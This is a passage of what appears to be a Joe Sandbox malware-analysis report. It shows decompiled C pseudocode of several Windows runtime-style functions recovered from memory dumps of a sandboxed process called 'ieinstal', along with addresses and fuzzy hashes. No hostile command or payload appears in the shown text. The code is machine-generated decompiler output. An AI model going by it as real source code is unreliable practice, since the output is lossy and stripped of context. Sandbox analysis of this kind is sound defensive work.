					_t29 =  *__ecx & _t83;
					_t74 = (_t83 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t83 - _t29 >> 4 << __ecx[1]) + _t29) {
						E1F08D297(__ecx, _t83, 0, _a4);
						_t83 = 1;
						if(E1EFD3C40() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E1F07F247( *((intOrPtr*)(_t80 + 0x24)), _t56);
						}
						goto L22;
					}
					if(( *(_t83 + 0xc) & 0x0000000c) != 8) {
						_t83 = E1F08F5C9(__ecx[6], _t74, __edx, _a4,  &_v8);
						if(_t83 != 0) {
							_t66 =  *((intOrPtr*)(_t80 + 0x14));
							_t77 = _v8;
							if(_v8 <= ( *( *((intOrPtr*)(_t80 + 0x14)) + 0x20) & 0x0000ffff) - 8) {
								E1F086554(_t66, _t77, 0);
							}
						}
					} else {
						_t83 = E1F0875C6(__ecx[5], _t74, __edx, _a4);
					}
					if(E1EFD3C40() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t83 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(_t83);
					_push(_t83);
					_push(_t83);
					_push(__edx);
					_t68 = 9;
					E1F085FED(_t68, __ecx[9]);
					L22:
					return _t83;
				}
			}

0x1f08ba6b
0x1f08ba6c
0x1f08ba70
0x1f08ba72
0x1f08ba79
0x1f08ba7b
0x1f08ba80
0x1f08ba9d
0x1f08baa6
0x1f08baaa
0x1f08bb4b
0x1f08bb52
0x1f08bb5a
0x1f08bb6c
0x1f08bb5c
0x1f08bb65
0x1f08bb65
0x1f08bb74
0x1f08bb85
0x1f08bb87
0x1f08bb8c
0x1f08bb8c
0x00000000
0x1f08bb74
0x1f08bab7
0x1f08bad9
0x1f08badd
0x1f08badf
0x1f08bae2
0x1f08baee
0x1f08baf2
0x1f08baf2
0x1f08baee
0x1f08bab9
0x1f08bac5
0x1f08bac5
0x1f08bafe
0x1f08bb10
0x1f08bb00
0x1f08bb09
0x1f08bb09
0x1f08bb18
0x00000000
0x1f08bb2d
0x1f08bb3f
0x00000000
0x1f08bb3f
0x1f08ba82
0x1f08ba85
0x1f08ba86
0x1f08ba87
0x1f08ba88
0x1f08ba8b
0x1f08ba8c
0x1f08bb91
0x1f08bb97
0x1f08bb97

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9802a52c5be734150b46dee019044715e57c9964f15bef3638fddc9abaa6a550
Instruction ID: f7e2eb96b57abae454632d98e55a826a63d4fbf7af56102d8a8b79a1196416fa
Opcode Fuzzy Hash: 9802a52c5be734150b46dee019044715e57c9964f15bef3638fddc9abaa6a550
Instruction Fuzzy Hash: B131E5B1F00A91ABC712CB68C855FAABFE9FF40750F084555E9458B745EAB4FC41C390

Uniqueness

Uniqueness Score: -1.00%

Function 1EFEFBC0 Relevance: .1, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E1EFEFBC0(intOrPtr* _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				intOrPtr _v16;
				signed int _v20;
				short _v46;
				char _v52;
				void* __esi;
				signed int _t38;
				void* _t39;
				void* _t43;
				intOrPtr* _t46;
				signed char* _t47;
				signed char* _t52;
				void* _t59;
				signed int _t72;
				void* _t73;
				intOrPtr* _t75;
				void* _t76;
				void* _t77;
				signed int _t78;

				_t80 = (_t78 & 0xfffffff8) - 0x34;
				_v8 =  *0x1f0bb370 ^ (_t78 & 0xfffffff8) - 0x00000034;
				_t38 = _a12;
				_t75 = _a4;
				if((_t38 & 0xe0000000) != 0 || (_t38 & 0x11000000) == 0x11000000) {
					_t39 = 0xc00000f1;
					L3:
					_pop(_t76);
					return E1F004B50(_t39, _t59, _v8 ^ _t80, _t72, _t73, _t76);
				} else {
					_t72 = _a8;
					if((_t72 & 0xff000000) != 0) {
						_t39 = 0xc00000f0;
						goto L3;
					} else {
						if((_t38 & 0x04000000) == 0) {
							 *((intOrPtr*)(_t75 + 4)) = 0xffffffff;
							 *((intOrPtr*)(_t75 + 8)) = 0;
							 *((intOrPtr*)(_t75 + 0xc)) = 0;
							 *((intOrPtr*)(_t75 + 0x10)) = 0;
							if( *((intOrPtr*)( *[fs:0x30] + 0x64)) <= 1) {
								_t72 = 0;
							} else {
								if((_t38 & 0x02000000) != 0 || _t72 == 0) {
									_t72 = 0x20007d0;
								} else {
									_t72 = _t72 & 0x00ffffff;
								}
							}
							 *(_t75 + 0x14) = _t38 & 0x09000000 | _t72;
							if((_t38 & 0x10000000) != 0 ||  *0x1f0b4ae0 != 0) {
								_t43 = 1;
							} else {
								_t43 = 0;
							}
							 *_t75 = 0xffffffff;
							if(_t43 != 0) {
								E1EFEFCE0(_t75, _t72);
								if( *_t75 == 0xffffffff) {
									 *(_t75 + 0x14) =  *(_t75 + 0x14) | 0x01000000;
								}
							}
							_t46 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
							if(_t46 != 0) {
								if( *_t46 == 0) {
									goto L15;
								} else {
									_t47 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
									goto L16;
								}
								goto L32;
							} else {
								L15:
								_t47 = 0x7ffe0382;
							}
							L16:
							if( *_t47 != 0) {
								if(( *( *[fs:0x30] + 0x240) & 0x00000002) != 0) {
									_v16 = _t75;
									_v46 = 0x1723;
									_v20 =  *(_t75 + 0x14);
									if(E1EFD3C40() == 0) {
										_t52 = 0x7ffe0382;
									} else {
										_t52 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
									}
									_push( &_v52);
									_push(8);
									_push(0x10402);
									_push( *_t52 & 0x000000ff);
									E1F002F90();
								}
							}
						}
						_pop(_t77);
						return E1F004B50(0, _t59, _v8 ^ _t80, _t72, _t73, _t77);
					}
				}
				L32:
			}

0x1efefbc8
0x1efefbd2
0x1efefbd6
0x1efefbda
0x1efefbe2
0x1efefbf4
0x1efefbf9
0x1efefbf9
0x1efefc08
0x1efefc0b
0x1efefc0b
0x1efefc14
0x1f0195b2
0x00000000
0x1efefc1a
0x1efefc1f
0x1efefc2c
0x1efefc33
0x1efefc3a
0x1efefc41
0x1efefc4c
0x1f0195bc
0x1efefc52
0x1efefc57
0x1efefcbf
0x1efefc5d
0x1efefc5d
0x1efefc5d
0x1efefc57
0x1efefc6d
0x1efefc75
0x1efefcc6
0x1efefc80
0x1efefc80
0x1efefc80
0x1efefc82
0x1efefc8a
0x1efefccc
0x1efefcd4
0x1f0195c3
0x1f0195c3
0x1efefcd4
0x1efefc92
0x1efefc97
0x1f0195d2
0x00000000
0x1f0195d8
0x1f0195e1
0x00000000
0x1f0195e1
0x00000000
0x1efefc9d
0x1efefc9d
0x1efefc9d
0x1efefc9d
0x1efefca2
0x1efefca5
0x1f0195f8
0x1f019603
0x1f019607
0x1f01960f
0x1f01961a
0x1f01962c
0x1f01961c
0x1f019625
0x1f019625
0x1f019638
0x1f019639
0x1f01963b
0x1f019640
0x1f019641
0x1f019641
0x1f0195f8
0x1efefca5
0x1efefcb1
0x1efefcbc
0x1efefcbc
0x1efefc14
0x00000000

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 250ca26e6e61b978d76cd69fd398b51a9961a5bf65df26f626c1396cd59cffa5
Instruction ID: d3e406369554f94db062c22fbdd1bacc6344289c1a934ccfe49c5a87bc8f020b
Opcode Fuzzy Hash: 250ca26e6e61b978d76cd69fd398b51a9961a5bf65df26f626c1396cd59cffa5
Instruction Fuzzy Hash: 7C41F232A18B818FE720CF28C461B5673E5BB44764F22875EEC568BAC4C738F681CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1EFC9AE4 Relevance: .1, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E1EFC9AE4(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t39;
				void* _t41;
				void* _t43;
				signed int _t48;
				signed int _t50;
				void* _t58;
				unsigned int _t70;
				char _t74;
				unsigned int _t76;
				unsigned int _t78;
				signed int _t79;
				void* _t82;

				_t71 = __edx;
				_v8 =  *0x1f0bb370 ^ _t79;
				_v536 = 0x200;
				_t74 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t57 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E1F004B50(_t74, _t57, _v8 ^ _t79, _t71, _t74, _t76);
				} else {
					_t39 = E1EFCB920( &_v524, __ecx);
					_t76 =  *(_t39 + 0x48) & 0x0000ffff;
					_v528 =  *(_t39 + 0x4a) & 0x0000ffff;
					_t41 = 0xa;
					_t82 = _t76 - _t41;
					if(_t82 > 0 || _t82 == 0) {
						 *_v548 = 0x1ef91130;
						L5:
						_t74 = 1;
						goto L6;
					} else {
						_t43 = E1EFC3E14(__ecx,  &_v532,  &_v536);
						_t71 = _v528;
						if(_t43 == 0) {
							L9:
							E1EFC824A(_t76, _t71,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t57 = _v532;
						if(_t57 != 0) {
							_t78 = (_t76 << 0x10) + (_t71 & 0x0000ffff);
							_t48 =  *_t57;
							_v528 = _t48;
							if(_t48 != 0) {
								_t58 = _t57 + 8;
								_t50 = _v528;
								do {
									if( *((intOrPtr*)(_t58 + 0x10)) == 1) {
										if(E1EFC9A75(_t58,  &_v540) == 0) {
											_t50 = _v528;
										} else {
											_t70 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t50 = _v528;
											if(_t70 >= _t78) {
												_t78 = _t70;
											}
										}
									}
									_t58 = _t58 + 0x20;
									_t50 = _t50 - 1;
									_v528 = _t50;
								} while (_t50 != 0);
								_t57 = _v532;
							}
							if(_t57 !=  &_v524) {
								E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t74, _t57);
							}
							_t71 = _t78 & 0x0000ffff;
							_t76 = _t78 >> 0x10;
						}
						goto L9;
					}
				}
			}

0x1efc9ae4
0x1efc9af6
0x1efc9afd
0x1efc9b08
0x1efc9b0a
0x1efc9b10
0x1efc9b16
0x1efc9b18
0x1efc9b24
0x1efc9b2c
0x1efc9b5f
0x1efc9b6f
0x1efc9b32
0x1efc9b33
0x1efc9b38
0x1efc9b40
0x1efc9b48
0x1efc9b49
0x1efc9b4c
0x1efc9b56
0x1efc9b5c
0x1efc9b5e
0x00000000
0x1efc9b70
0x1efc9b7f
0x1efc9b84
0x1efc9b8c
0x1efc9b98
0x1efc9ba1
0x1efc9bb2
0x00000000
0x1efc9bb2
0x1efc9b8e
0x1efc9b96
0x1efc9bbc
0x1efc9bbe
0x1efc9bc0
0x1efc9bc8
0x1efc9be3
0x1efc9be5
0x1efc9beb
0x1efc9bef
0x1efc9c00
0x1efc9c39
0x1efc9c02
0x1efc9c13
0x1efc9c15
0x1efc9c1d
0x1efc9c35
0x1efc9c35
0x1efc9c1d
0x1efc9c00
0x1efc9c1f
0x1efc9c22
0x1efc9c25
0x1efc9c25
0x1efc9c2d
0x1efc9c2d
0x1efc9bd2
0x1f022804
0x1f022804
0x1efc9bd8
0x1efc9bdb
0x1efc9bdb
0x00000000
0x1efc9b96
0x1efc9b4c

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab891ea719c2aa960951778a6d611e9d908ec4ba4916345f21216469115fe799
Instruction ID: fd62f6483fbfc8ecd6a4876665c328ead08848f94c8d451a55fd9fb329be5794
Opcode Fuzzy Hash: ab891ea719c2aa960951778a6d611e9d908ec4ba4916345f21216469115fe799
Instruction Fuzzy Hash: 2F416275A0022A9BDB24DF56C8E8EA9B3F5EB44340F2506EADD0997251D770DE84CF60

Uniqueness

Uniqueness Score: -1.00%

Function 1EFC6E00 Relevance: .1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E1EFC6E00(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				void* __ebx;
				void* _t39;
				intOrPtr* _t44;
				char* _t45;
				intOrPtr* _t53;
				char* _t54;
				intOrPtr _t63;
				intOrPtr _t82;
				intOrPtr _t85;

				_push(__ecx);
				_t63 = _a4;
				_t82 = _a8;
				_t85 =  *((intOrPtr*)(_t82 + 0x88));
				if(_t85 != 0) {
					_t39 = E1EFE2120(_t63, __ecx, 0, _t85);
					if(_t39 >= 0) {
						 *(_t63 + 0x50) =  *(_t63 + 0x50) | 0x00000100;
						 *((intOrPtr*)(_t63 + 0x64)) = _t85;
						goto L1;
					}
				} else {
					L1:
					_t4 = _t82 + 0x30; // 0x40
					asm("lock inc dword [esi]");
					E1EFC71C9(_t82);
					_t5 = _t82 + 0x50; // 0x60
					E1EFEDB40(_t5, 1, 0);
					E1EFC7007(_t63, _t4);
					_t44 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
					if(_t44 != 0) {
						if( *_t44 == 0) {
							goto L2;
						} else {
							_t45 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							goto L3;
						}
						goto L10;
					} else {
						L2:
						_t45 = 0x7ffe0386;
					}
					L3:
					if( *_t45 != 0) {
						E1F094C59( *((intOrPtr*)(_t82 + 0x8c)), _t82,  *((intOrPtr*)(_t82 + 0x60)),  *((intOrPtr*)(_t82 + 0x64)),  *((intOrPtr*)(_t82 + 0x6c)));
					}
					E1EFC6F4C( &_v8,  *((intOrPtr*)(_t82 + 0x60)),  *((intOrPtr*)(_t82 + 0x64)),  *((intOrPtr*)(_t82 + 0x6c)));
					 *((intOrPtr*)(_t63 + 0x30)) =  *((intOrPtr*)(_t82 + 0x60));
					 *((intOrPtr*)(_t63 + 0x34)) =  *((intOrPtr*)(_t82 + 0x64));
					if(( *(_t82 + 0xb4) & 0x00000001) == 0) {
						 *0x1f0b91e0(_t63,  *((intOrPtr*)(_t82 + 0x64)), _t82);
						 *((intOrPtr*)( *((intOrPtr*)(_t82 + 0x60))))();
					} else {
						 *((intOrPtr*)(_t63 + 0x4c)) = _t82;
						 *0x1f0b91e0(_t63,  *((intOrPtr*)(_t82 + 0x64)), _t82, _a12);
						 *((intOrPtr*)( *((intOrPtr*)(_t82 + 0x60))))();
					}
					_t53 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
					if(_t53 != 0) {
						if( *_t53 == 0) {
							goto L7;
						} else {
							_t54 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							goto L8;
						}
						L20:
					} else {
						L7:
						_t54 = 0x7ffe0386;
					}
					L8:
					if( *_t54 != 0) {
						E1F094CD2( *((intOrPtr*)(_t82 + 0x8c)), _t82,  *((intOrPtr*)(_t82 + 0x60)),  *((intOrPtr*)(_t82 + 0x64)),  *((intOrPtr*)(_t82 + 0x6c)));
					}
					_t39 = E1EFC6ECF(_v8);
				}
				L10:
				return _t39;
				goto L20;
			}

0x1efc6e05
0x1efc6e07
0x1efc6e0c
0x1efc6e0f
0x1efc6e17
0x1f021490
0x1f021497
0x1f02149d
0x1f0214a4
0x00000000
0x1f0214a4
0x1efc6e1d
0x1efc6e1d
0x1efc6e1d
0x1efc6e20
0x1efc6e25
0x1efc6e2c
0x1efc6e32
0x1efc6e3b
0x1efc6e46
0x1efc6e4b
0x1f0214af
0x00000000
0x1f0214b5
0x1f0214be
0x00000000
0x1f0214be
0x00000000
0x1efc6e51
0x1efc6e51
0x1efc6e51
0x1efc6e51
0x1efc6e56
0x1efc6e59
0x1f0214d9
0x1f0214d9
0x1efc6e6b
0x1efc6e73
0x1efc6e79
0x1efc6e83
0x1f0214ed
0x1f0214f3
0x1efc6e89
0x1efc6e8c
0x1efc6e99
0x1efc6e9f
0x1efc6e9f
0x1efc6ea7
0x1efc6eac
0x1f0214fd
0x00000000
0x1f021503
0x1f02150c
0x00000000
0x1f02150c
0x00000000
0x1efc6eb2
0x1efc6eb2
0x1efc6eb2
0x1efc6eb2
0x1efc6eb7
0x1efc6eba
0x1f021527
0x1f021527
0x1efc6ec3
0x1efc6ec3
0x1efc6ec8
0x1efc6ecc
0x00000000

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5ab0c6cd25a210c2ae7d1e7dbee072212d8b685d70e1d0be2ad4f163d061e50
Instruction ID: 94cf3c6a32c154791ded19da5cec41947b8e81bc3f4604a5f99237efc6fb8cb2
Opcode Fuzzy Hash: b5ab0c6cd25a210c2ae7d1e7dbee072212d8b685d70e1d0be2ad4f163d061e50
Instruction Fuzzy Hash: A7418F3A704A46EFCB16CF25C864F4ABBA5FF84B00F114196ED0587651DB35F820DB90

Uniqueness

Uniqueness Score: -1.00%

Function 1F03FBC2 Relevance: .1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E1F03FBC2(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				char _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x1f0bb370 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(E1EFE1C7D(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E1F03FDBA() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E1F002E30() >= 0) {
							L1EFD2330(_t56, 0x1f0b698c);
							_t77 = 1;
							_t68 = 1;
							if( *0x1f0b6984 == 0) {
								asm("cdq");
								 *(_t79 + 0x1178) = _v64;
								 *(_t79 + 0x117c) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x1f0b6984 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E1EFBBD70(0x1efa1298, 0x1efa11e8, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E1F0029D0();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E1F002A80();
					 *(_t79 + 0x1178) =  *(_t79 + 0x1178) & 0x00000000;
					 *(_t79 + 0x117c) =  *(_t79 + 0x117c) & 0x00000000;
				}
				if(_t77 != 0) {
					E1EFD24D0(0x1f0b698c);
				}
				_pop(_t78);
				return E1F004B50(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}

0x1f03fbd1
0x1f03fbda
0x1f03fbdf
0x1f03fbe5
0x1f03fbe8
0x1f03fbed
0x1f03fbef
0x1f03fbfa
0x1f03fbfd
0x1f03fc06
0x1f03fc12
0x1f03fc1a
0x1f03fc2f
0x1f03fc30
0x1f03fc31
0x1f03fc32
0x1f03fc3a
0x1f03fc42
0x1f03fc4d
0x1f03fc52
0x1f03fc53
0x1f03fc5c
0x1f03fc65
0x1f03fc66
0x1f03fc6f
0x1f03fc75
0x1f03fc79
0x1f03fc7a
0x1f03fc80
0x1f03fc83
0x1f03fc86
0x1f03fc89
0x1f03fc8c
0x1f03fc92
0x1f03fc98
0x1f03fca1
0x1f03fca4
0x1f03fcb7
0x1f03fcba
0x1f03fcbd
0x1f03fcc0
0x1f03fcca
0x1f03fccc
0x1f03fcd3
0x1f03fcd4
0x1f03fcd6
0x1f03fcd9
0x1f03fce0
0x1f03fce0
0x1f03fcca
0x1f03fc5c
0x1f03fc42
0x1f03fc1a
0x1f03fce9
0x1f03fceb
0x1f03fcee
0x1f03fcf3
0x1f03fcfa
0x1f03fcfa
0x1f03fd03
0x1f03fd0a
0x1f03fd0a
0x1f03fd14
0x1f03fd1f

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a729fee6d047a8144b8ffc38ca043d4cf613147e24f6e7753408270107f4e1a0
Instruction ID: e8e419a6f02952418e3ec9fe8c1b6622f03b9144f49a37427c3e0acb6a67d544
Opcode Fuzzy Hash: a729fee6d047a8144b8ffc38ca043d4cf613147e24f6e7753408270107f4e1a0
Instruction Fuzzy Hash: CD416BB5D002099FDB18CFA5D940BEEBBF9FF48312F10452EE855A7290EB34A905CB50

Uniqueness

Uniqueness Score: -1.00%

Function 1EFB7BF0 Relevance: .1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E1EFB7BF0(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E1EFB7C85(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E1F002A80();
							E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						_push(0x1f0b5b40);
						E1EFCE740(_t54);
					}
					return _t52 + 2;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E1F002A80();
								E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							_push(0x1f0b5b40);
							E1EFCE740(_t54);
						}
						return _t52;
					}
					L5:
					_t33 = E1F0088C0(_a8, _t54, _t52);
					if(_t61 == 0) {
						_push(0x1f0b5b40);
						E1EFCE740(_t54);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E1F002A80();
							E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}

0x1efb7c00
0x1efb7c04
0x1f01afe4
0x1f01afe7
0x1f01afea
0x1efb7c0a
0x1efb7c0a
0x1efb7c0d
0x1efb7c0d
0x1efb7c11
0x1efb7c15
0x1efb7c19
0x1f01b02d
0x1f01b033
0x00000000
0x00000000
0x1f01b03b
0x1f01b04c
0x1f01b050
0x1f01b052
0x1f01b055
0x1f01b066
0x1f01b066
0x1f01b03d
0x1f01b03d
0x1f01b042
0x1f01b042
0x00000000
0x1efb7c2a
0x1efb7c2a
0x1efb7c30
0x1f01aff5
0x1f01b006
0x1f01b00a
0x1f01b00c
0x1f01b00f
0x1f01b021
0x1f01b021
0x1f01aff7
0x1f01aff7
0x1f01affc
0x1f01affc
0x00000000
0x1f01b026
0x1efb7c36
0x1efb7c3b
0x1efb7c45
0x1f01b073
0x1f01b078
0x1efb7c4b
0x1efb7c4e
0x1efb7c52
0x1f01b082
0x1f01b085
0x1f01b096
0x1f01b096
0x1efb7c52
0x1efb7c58
0x1efb7c5e
0x1efb7c6a
0x1efb7c6c
0x1efb7c6d
0x00000000
0x1efb7c60
0x1efb7c62
0x1efb7c68
0x1efb7c7f
0x1efb7c72
0x00000000
0x1efb7c72
0x00000000
0x1efb7c68
0x1efb7c5e

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e3a0013674a27fc517e87f1a2d7ac2c0117de08e228bb762d97f7f818f9c9e1
Instruction ID: dd86bcb04524a72ed75c39d26ca425d0a5f980d68ff603e45d8305c2806f0866
Opcode Fuzzy Hash: 7e3a0013674a27fc517e87f1a2d7ac2c0117de08e228bb762d97f7f818f9c9e1
Instruction Fuzzy Hash: 8531D2B2505A41EBC332DF25CCA1F6AB7A5FF00760F194B29E8654F1E0EB21E944CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1EFF7E71 Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1EFF7E71(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L23:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E1EFE10D0(0, _t61, 0x1ef9115c);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E1EFE10D0(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
